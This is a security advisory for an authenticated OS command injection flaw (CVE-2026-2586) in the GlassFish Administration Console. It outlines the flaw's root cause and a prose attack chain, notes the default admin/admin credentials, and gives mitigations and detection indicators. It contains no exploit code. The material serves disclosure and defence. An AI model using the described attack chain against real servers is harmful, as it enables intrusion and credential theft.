Executive Summary
A critical authenticated Remote Code Execution vulnerability (CVE-2026-2586) has been disclosed in the GlassFish Administration Console. Any user with access to the administration panel can craft malicious HTTP requests that trigger arbitrary operating system command execution, running with the privileges of the GlassFish service account.
With a CVSS score of 9.1 (Critical), this vulnerability represents a high-impact risk for any GlassFish deployment where the Administration Console is reachable — even over a private network — and where administrative credentials may have been compromised or shared.
CVSS Score: 9.1 (Critical)
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-2586 |
| CVSS Score | 9.1 (Critical) |
| Type | OS Command Injection |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low (authenticated) |
| User Interaction | None |
| Affected Component | GlassFish Administration Console |
| Public Exploit | Not confirmed at publication |
| Published | 2026-05-19 |
Affected Products
| Product | Status |
|---|---|
| GlassFish Administration Console | Vulnerable |
GlassFish is Oracle's open-source Java EE / Jakarta EE application server. The Administration Console is a web-based management interface used to configure deployments, data sources, and server settings. It is typically deployed on port 4848 and requires authentication.
Technical Details
Vulnerability Root Cause
The Administration Console processes user-supplied input from authenticated requests without adequate sanitization before passing values to OS-level operations. An attacker with valid credentials to the console can supply specially crafted request parameters that inject shell metacharacters or command sequences, which are evaluated by the underlying operating system.
Attack Chain
1. Attacker obtains or guesses valid GlassFish admin credentials
(default credentials, credential stuffing, or phishing)
2. Attacker authenticates to the Administration Console (port 4848 by default)
3. A crafted POST request targeting a vulnerable admin endpoint is submitted
with injected OS command payload in a parameter value
4. GlassFish passes the unsanitized parameter to an OS-level function
without adequate validation
5. The injected command executes with the privileges of the GlassFish
service user (often a dedicated service account or root in misconfigured deployments)
6. Attacker achieves arbitrary code execution on the host serverWhy CVSS 9.1?
The score reflects network-accessible exploitation requiring only low-privilege authenticated access, with no user interaction needed. All three impact categories (Confidentiality, Integrity, Availability) are rated High. The single scoring reduction from 10.0 is due to the authentication prerequisite, though in practice, default or weak admin credentials make this a low barrier for attackers.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary commands execute as the GlassFish service user |
| Data Exfiltration | Access to application data, configuration files, and secrets stored on the host |
| Lateral Movement | Compromised server may provide access to internal network resources |
| Credential Theft | GlassFish keystore, database connection passwords, and API keys accessible |
| Service Disruption | Attacker can stop, reconfigure, or corrupt the GlassFish instance |
| Container Escape Risk | Containerized deployments with host mounts may enable broader host access |
Recommendations
Immediate Actions
- Restrict access to the GlassFish Administration Console — port 4848 should never be internet-facing; enforce firewall rules to allow access only from trusted admin subnets
- Change default admin credentials — GlassFish ships with default credentials (
admin/admin); change these immediately if not already done - Monitor for an official patch from Oracle or the Eclipse GlassFish project and apply when available
- Audit admin account access — review who has GlassFish admin credentials and revoke unnecessary access
Network-Level Mitigations
- Block port 4848 (GlassFish Admin Console) at the perimeter firewall
- Restrict access to trusted management VLAN or jump host only
- Enable mutual TLS for the admin console if supported by your version
- Place GlassFish behind a reverse proxy with additional authentication (e.g., mTLS or SSO)Monitoring
- Alert on unexpected outbound connections from the GlassFish process user
- Monitor for anomalous child processes spawned by the Java service
- Review GlassFish server logs for unexpected admin console access patterns
- Enable audit logging in GlassFish for all administrative actionsDetection Indicators
| Indicator | Description |
|---|---|
| Unexpected child processes from Java/GlassFish PID | Possible command injection execution |
| Outbound connections to unfamiliar IPs from the server | Possible C2 or data exfiltration |
| New files or scripts in GlassFish deployment directories | Possible web shell or backdoor placement |
| Changes to GlassFish configuration without admin session records | Possible unauthorized access |
Post-Remediation Checklist
- Apply available patch once released by Oracle/Eclipse GlassFish project
- Rotate all credentials associated with the GlassFish instance: admin passwords, database connection strings, and SSL/TLS keystores
- Audit deployed applications for unauthorized modifications or injected code
- Review OS-level accounts the GlassFish service runs as; ensure it uses a minimal-privilege service account
- Verify firewall rules confirm port 4848 is blocked from untrusted networks
- Review audit logs for the timeframe during which the vulnerability was exposed